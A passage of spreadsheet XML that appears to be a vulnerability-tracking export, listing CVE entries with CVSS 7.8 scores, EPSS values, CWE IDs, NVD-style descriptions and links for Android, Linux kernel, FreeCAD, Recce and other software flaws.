          <t>CVE-2026-28658</t>
        </is>
      </c>
      <c r="C2044" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2044" s="5" t="inlineStr"/>
      <c r="F2044" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2044" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2044" s="5" t="inlineStr"/>
      <c r="I2044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2044" s="5" t="inlineStr"/>
      <c r="K2044" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2044" s="5" t="inlineStr">
        <is>
          <t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t>
        </is>
      </c>
    </row>
    <row r="2045">
      <c r="A2045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28663</t>
        </is>
      </c>
      <c r="C2045" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2045" s="5" t="inlineStr"/>
      <c r="F2045" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2045" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2045" s="5" t="inlineStr"/>
      <c r="I2045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2045" s="5" t="inlineStr"/>
      <c r="K2045" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L2045" s="5" t="inlineStr">
        <is>
          <t>In buildIntentSenderForUser of LauncherAppsService.java, there is a possible way to launch an activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t>
        </is>
      </c>
    </row>
    <row r="2046">
      <c r="A2046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28664</t>
        </is>
      </c>
      <c r="C2046" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2046" s="5" t="inlineStr"/>
      <c r="F2046" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2046" s="5" t="inlineStr"/>
      <c r="H2046" s="5" t="inlineStr"/>
      <c r="I2046" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2046" s="5" t="inlineStr"/>
      <c r="K2046" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2046" s="5" t="inlineStr">
        <is>
          <t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t>
        </is>
      </c>
    </row>
    <row r="2047">
      <c r="A2047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28668</t>
        </is>
      </c>
      <c r="C2047" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2047" s="5" t="inlineStr"/>
      <c r="F2047" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2047" s="5" t="inlineStr"/>
      <c r="H2047" s="5" t="inlineStr"/>
      <c r="I2047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2047" s="5" t="inlineStr"/>
      <c r="K2047" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2047" s="5" t="inlineStr">
        <is>
          <t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t>
        </is>
      </c>
    </row>
    <row r="2048">
      <c r="A2048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30512</t>
        </is>
      </c>
      <c r="C2048" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2048" s="5" t="inlineStr"/>
      <c r="F2048" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2048" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2048" s="5" t="inlineStr"/>
      <c r="I2048" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2048" s="5" t="inlineStr"/>
      <c r="K2048" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L2048" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the Restricted Access (Kiosk) Mode implementation of Scheidt &amp; Bachmann entervo HMI prior to V2 R5 P0 M5. The vulnerability affects the external PDF viewer functionality used to display the application manual and its interaction with the underlying Windows operating system. An authenticated low-privileged user can escape the kiosk environment by opening the application manual in the external PDF viewer and abusing the print functionality. Successful exploitation allows execution of arbitrary commands outside the kiosk environment with local administrator privileges.</t>
        </is>
      </c>
      <c r="M2048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30512</t>
        </is>
      </c>
    </row>
    <row r="2049">
      <c r="A2049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34398</t>
        </is>
      </c>
      <c r="C2049" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2049" s="5" t="inlineStr"/>
      <c r="F2049" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2049" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2049" s="5" t="inlineStr"/>
      <c r="I2049" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2049" s="5" t="inlineStr"/>
      <c r="K2049" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2049" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. From 0.19 until 1.1.1, src/Mod/BIM/bimcommands/BimProjectManager.py in the BIM Project Manager Load Template flow passes attacker-controlled FCStd Meta property values for wpposition, wpu, wpv, and wpaxis directly to eval(), allowing arbitrary Python code execution when a user loads a malicious BIM project template. This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="M2049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34398</t>
        </is>
      </c>
    </row>
    <row r="2050">
      <c r="A2050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34399</t>
        </is>
      </c>
      <c r="C2050" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2050" s="5" t="inlineStr"/>
      <c r="F2050" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2050" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2050" s="5" t="inlineStr"/>
      <c r="I2050" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2050" s="5" t="inlineStr"/>
      <c r="K2050" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2050" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. From 0.19 until 1.1.1, FreeCAD's BIM Workbench contains an eval() call on untrusted data from SVG template files. When a user creates a TechDraw page from a malicious SVG template, arbitrary Python code executes. The vulnerable code is in src/Mod/BIM/bimcommands/BimTDPage.py (line 87). This issue is fixed in version 1.1.1.</t>
        </is>
      </c>
      <c r="M2050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34399</t>
        </is>
      </c>
    </row>
    <row r="2051">
      <c r="A2051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45200</t>
        </is>
      </c>
      <c r="C2051" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2051" s="5" t="inlineStr"/>
      <c r="F2051" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2051" s="5" t="inlineStr"/>
      <c r="H2051" s="5" t="inlineStr"/>
      <c r="I2051" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2051" s="5" t="inlineStr"/>
      <c r="K2051" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2051" s="5" t="inlineStr">
        <is>
          <t>Software installed and run as a non-privileged user may conduct improper GPU driver IOCTL calls to create an allocation scenario that when freed would cause double free and kernel heap corruption.
Scenario caused by fabricating a specific combination of flags on the allocation interface that would cause an incorrect double free event when freed.</t>
        </is>
      </c>
      <c r="M2051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45200</t>
        </is>
      </c>
    </row>
    <row r="2052">
      <c r="A2052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45515</t>
        </is>
      </c>
      <c r="C2052" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2052" s="5" t="inlineStr"/>
      <c r="F2052" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2052" s="5" t="inlineStr"/>
      <c r="H2052" s="5" t="inlineStr"/>
      <c r="I2052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2052" s="5" t="inlineStr"/>
      <c r="K2052" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L2052" s="5" t="inlineStr">
        <is>
          <t>In a2dp_vendor_opus_decoder_decode_packet of a2dp_vendor_opus_decoder.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t>
        </is>
      </c>
    </row>
    <row r="2053">
      <c r="A2053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45520</t>
        </is>
      </c>
      <c r="C2053" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2053" s="5" t="inlineStr"/>
      <c r="F2053" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2053" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2053" s="5" t="inlineStr"/>
      <c r="I2053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2053" s="5" t="inlineStr"/>
      <c r="K2053" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L2053" s="5" t="inlineStr">
        <is>
          <t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t>
        </is>
      </c>
    </row>
    <row r="2054">
      <c r="A2054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45531</t>
        </is>
      </c>
      <c r="C2054" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2054" s="5" t="inlineStr"/>
      <c r="F2054" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2054" s="5" t="inlineStr"/>
      <c r="H2054" s="5" t="inlineStr"/>
      <c r="I2054" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2054" s="5" t="inlineStr"/>
      <c r="K2054" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2054" s="5" t="inlineStr">
        <is>
          <t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t>
        </is>
      </c>
    </row>
    <row r="2055">
      <c r="A2055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45998</t>
        </is>
      </c>
      <c r="C2055" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2055" s="5" t="inlineStr"/>
      <c r="F2055" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2055" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2055" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2055" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J2055" s="5" t="inlineStr"/>
      <c r="K2055" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-825</t>
        </is>
      </c>
      <c r="L2055" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rxrpc: Fix potential UAF after skb_unshare() failure
If skb_unshare() fails to unshare a packet due to allocation failure in
rxrpc_input_packet(), the skb pointer in the parent (rxrpc_io_thread())
will be NULL'd out.  This will likely cause the call to
trace_rxrpc_rx_done() to oops.
Fix this by moving the unsharing down to where rxrpc_input_call_event()
calls rxrpc_input_call_packet().  There are a number of places prior to
that where we ignore DATA packets for a variety of reasons (such as the
call already being complete) for which an unshare is then avoided.
And with that, rxrpc_input_packet() doesn't need to take a pointer to the
pointer to the packet, so change that to just a pointer.</t>
        </is>
      </c>
      <c r="M2055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45998</t>
        </is>
      </c>
    </row>
    <row r="2056">
      <c r="A2056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46117</t>
        </is>
      </c>
      <c r="C2056" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2056" s="5" t="inlineStr"/>
      <c r="F2056" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2056" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2056" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2056" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2056" s="5" t="inlineStr"/>
      <c r="K2056" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-617</t>
        </is>
      </c>
      <c r="L2056" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana: Remove user triggerable WARN_ON() in mana_ib_create_qp_rss()
Sashiko points out that the user can specify WQs sharing the same CQ as a
part of the uAPI and this will trigger the WARN_ON() then go on to corrupt
the kernel.
Just reject it outright and fail the QP creation.</t>
        </is>
      </c>
      <c r="M2056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46117</t>
        </is>
      </c>
    </row>
    <row r="2057">
      <c r="A2057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46145</t>
        </is>
      </c>
      <c r="C2057" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2057" s="5" t="inlineStr"/>
      <c r="F2057" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2057" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2057" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2057" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2057" s="5" t="inlineStr"/>
      <c r="K2057" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2057" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mana: Validate rx_hash_key_len
Sashiko points out that rx_hash_key_len comes from a uAPI structure and is
blindly passed to memcpy, allowing the userspace to trash kernel
memory. Bounds check it so the memcpy cannot overflow.</t>
        </is>
      </c>
      <c r="M2057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46145</t>
        </is>
      </c>
    </row>
    <row r="2058">
      <c r="A2058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46189</t>
        </is>
      </c>
      <c r="C2058" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2058" s="5" t="inlineStr"/>
      <c r="F2058" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2058" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2058" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2058" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2058" s="5" t="inlineStr"/>
      <c r="K2058" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-763</t>
        </is>
      </c>
      <c r="L2058" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/vmw_pvrdma: Fix double free on pvrdma_alloc_ucontext() error path
Sashiko points out that pvrdma_uar_free() is already called within
pvrdma_dealloc_ucontext(), so calling it before triggers a double free.</t>
        </is>
      </c>
      <c r="M2058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46189</t>
        </is>
      </c>
    </row>
    <row r="2059">
      <c r="A2059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48097</t>
        </is>
      </c>
      <c r="C2059" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2059" s="5" t="inlineStr"/>
      <c r="F2059" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2059" s="5" t="inlineStr"/>
      <c r="H2059" s="5" t="inlineStr"/>
      <c r="I2059" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2059" s="5" t="inlineStr"/>
      <c r="K2059" s="5" t="inlineStr">
        <is>
          <t>CWE-476, CWE-78</t>
        </is>
      </c>
      <c r="L2059" s="5" t="inlineStr">
        <is>
          <t>NexTor IP Changer is a command-line tool that leverages the Tor network to periodically rotate a user's IP address. Versions prior to 2.0.0 have a command execution vulnerability due to unsafe use of `shell=True` with commands that rely on executable resolution through the `PATH` environment variable. An attacker controlling the execution environment can place malicious executables such as sudo earlier in the `PATH`, resulting in execution of attacker-controlled code. Version 2.0.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M2059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48097</t>
        </is>
      </c>
    </row>
    <row r="2060">
      <c r="A2060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49360</t>
        </is>
      </c>
      <c r="C2060" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2060" s="5" t="inlineStr"/>
      <c r="F2060" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2060" s="5" t="inlineStr"/>
      <c r="H2060" s="5" t="inlineStr"/>
      <c r="I2060" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2060" s="5" t="inlineStr"/>
      <c r="K2060" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L2060" s="5" t="inlineStr">
        <is>
          <t>Recce is a data-validation toolkit for enhanced dbt (data build tool) PR review. Prior to version 1.50.0, OSS server deployments that expose the server to an untrusted network without authentication are vulnerable to unauthenticated SQL execution through the query run API. When Recce is configured with a DuckDB-backed project, an attacker can use DuckDB filesystem primitives to read and write files accessible to the Recce server process. The impact depends on how Recce is deployed, but may include disclosure of local files, tampering with Recce/dbt artifacts, modification of browser-served static files leading to stored XSS, and modification of application files if those paths are writable. If Recce is run as root, file access occurs with root privileges inside that host or container. This issue has been patched in Recce `v1.50.0`. Users should upgrade to Recce `v1.50.0` or later. The patch restricts unsafe file read/write behavior for DuckDB-backed query execution and hardens the affected query path. Other warehouse adapters have also been reviewed for similar exposure. Users who cannot upgrade immediately should avoid exposing `recce server` to the public internet or any untrusted network. Recommended mitigations include enabling authentication or placing Recce behind an authenticated reverse proxy/VPN, running Recce as a non-root user, using a read-only application filesystem where possible, and ensuring that sensitive files or credentials are not available to the Recce process.</t>
        </is>
      </c>
      <c r="M2060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49360</t>
        </is>
      </c>
    </row>
    <row r="2061">
      <c r="A2061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49881</t>
        </is>
      </c>
      <c r="C2061" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2061" s="5" t="inlineStr"/>
      <c r="F2061" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2061" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2061" s="5" t="inlineStr"/>
      <c r="I2061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2061" s="5" t="inlineStr"/>
      <c r="K2061" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2061" s="5" t="inlineStr">
        <is>
          <t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t>
        </is>
      </c>
    </row>
    <row r="2062">
      <c r="A2062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49884</t>
        </is>
      </c>
      <c r="C2062" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2062" s="5" t="inlineStr"/>
      <c r="F2062" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2062" s="5" t="inlineStr"/>
      <c r="H2062" s="5" t="inlineStr"/>
      <c r="I2062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2062" s="5" t="inlineStr"/>
      <c r="K2062" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2062" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t>
        </is>
      </c>
    </row>
    <row r="2063">
      <c r="A2063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49887</t>
        </is>
      </c>
      <c r="C2063" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2063" s="5" t="inlineStr"/>
      <c r="F2063" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2063" s="5" t="inlineStr"/>
      <c r="H2063" s="5" t="inlineStr"/>
      <c r="I2063" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2063" s="5" t="inlineStr"/>
      <c r="K2063" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L2063" s="5" t="inlineStr">
        <is>
          <t>In maybeRemoveInvalidInstallerPackageName of InstallRepository.kt, there is a possible unauthorized app update due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t>
        </is>
      </c>
    </row>
    <row r="2064">
      <c r="A2064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49918</t>
        </is>
      </c>
      <c r="C2064" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2064" s="5" t="inlineStr"/>
      <c r="F2064" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2064" s="5" t="inlineStr"/>
      <c r="H2064" s="5" t="inlineStr"/>
      <c r="I2064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2064" s="5" t="inlineStr"/>
      <c r="K2064" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2064" s="5" t="inlineStr">
        <is>
          <t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t>
        </is>
      </c>
    </row>
    <row r="2065">
      <c r="A2065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49919</t>
        </is>
      </c>
      <c r="C2065" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2065" s="5" t="inlineStr"/>
